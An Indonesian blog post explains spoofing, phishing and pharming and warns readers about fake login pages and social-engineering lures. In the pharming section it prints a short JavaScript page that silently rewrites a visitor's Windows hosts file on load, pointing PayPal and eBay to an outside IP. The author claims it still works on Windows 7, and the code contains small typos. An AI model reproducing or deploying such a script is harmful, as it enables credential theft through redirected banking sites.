Spoofing, Phising, dan Pharming | Pengertian | Penjelasan

Spoofing, Phising, dan Pharming

Lihat lah definisi masing-masing istilah berikut :

• Spoofing

adalah serangan dimana sebuah program disamarkan seperti program yang lain. Yang paling umum adalah meng-clone URL atau situs web (Lihat definisi phishing).

• Phishing (dari kata "fishing/memancing")

adalah bentuk umum dari Spoofing, dimana halaman web palsu dibikin seolah-olah terlihat seperti halaman web yang asli. Halaman palsu diletakkan di server yang berada di bawah kendali sang penjahat.                                                                                                                                                     

Penjahat mencoba untuk mengelabui pengguna untuk berpikir bahwa mereka terhubung ke situs yang benar, dimana kemudian username, password, rincian kartu kredit dan informasi sensitif  lainnya dapat diperoleh dengan mudah. eBay, PayPal dan bank online adalah terget umum Phising.

Phishing biasanya dilakukan melalui email atau pesan instan. Pesan email mengaku dari sumber yang sah, tapi ketika pengguna mengklik link yang diberikan, ia diarahkan ke halaman web palsu.

• Pharming (dari kata "farming/pertanian")

adalah sebuah serangan dimana seorang peretas mencoba untuk mengarahkan sebuah situs web ke situs yang palsu dengan cara mengubah host file di komputer korban atau dengan eksploitasi kerentanan dalam perangkat lunak DNS server. DNS ini bertugas untuk menerjemahkan sebuah domain ke alamat IP yang sesungguhnya di Internet.

Phising, yaitu menipu korban dengan teknik Social Engineering agar korban masuk ke halaman situs palsi, yang seolah-olah mirip dengan aslinya.

Tanpa kita sadari, kita sering kali menerima telpon maupun sms yang menyatakan bahwa kita memenangkan sebuah hadiah. Ini adalah salah satu bentuk Social Engineering yang akan mengiring kita ke halaman web palsu, dimana jika kita lengah, kita akan menjadi salah satu korbannya.

Tujuan dari si pengirim sebenarnya adalah mendapatkan username dan password kita yang nantinya dapat digunakan olehnya unutk login seolah-olah yang login adalah kita.

salah satu contoh bentuk phishing.

Atau umumnya dengan meniru persis halaman login sebuah website. 

Sebaiknya kita berhati-hati sebelum melakukan transaksi online, karena kejahatan phishing ini semakin marak terjadi, karena untuk melakukannya dibutuhkan satu keahlian khusus, seperti harus menguasai bahasa pemrogramman tertentu.

Lain halnya dengan Pharming, membutuhkan sedikit pengetahuan scripting yang lebih lanjut. Secara singkat, Pharming mengutak-atik file host yang ada di sistem Windows. Host file di Windows XP berada di: C:\WINDOWS\system32\Drivers\etc\hosts

Dengan Javascript, kita dapat membuat sebuah script sederhana sebagai berikut:

<html>

<head>

<script language="javascript">

function pharmer(){

var fso = new ActiveXObject("Scripting.FileSystemObject");

var pharm = fso.CreateTextFile("C:\WINDOWS\system32\Drivers\etc\hosts

", true);

pharm.WriteLine('127.0.0.1 localhost');

pharm.WriteLine('188.222.33.1 paypal');

pharm.WriteLine('188.222.33.1 www.paypal,com');

pharm.WriteLine('188.222.33.1 ebay.com');

pharm.WriteLine('188.222.33.1 www.ebay.com');

pharm.Close();

}

</script>

</head>

<body onLoad="pharmer()">

</body>

</html>

Oleh beberapa orang, trik ini bisa digunakan untuk melakukan pemblokiran terhadap beberapa situs tertentu. Dengan teknik Social Engineering, file aplikasi bisa masuk ke komputer target dan menimpa file host ini, sehingga akses ke sebuah situs tidak dapat dilakukan.

Saya sendiri pernah mencoba di Windows 7 dan ternyata masih bisa. Sementara di sistem operasi Linux, file host ini terletak di direktori /etc/hosts. Sedangkan di sistem operasi Mac, lokasinya ada di direktori /private/etc/hosts, sehingga jika kita ingin mengedit harus melalui terminal prompt dengan mengetikkan perintah sudo nano /private/etc/hosts.

Sekian penjelasan saya kali ini mengenai Spoofing, Phishing, dan Pharming. Smoga informasi yang saya berikan bermanfaat :). Terima kasih telah mengunjungi Blog saya Bye Bye.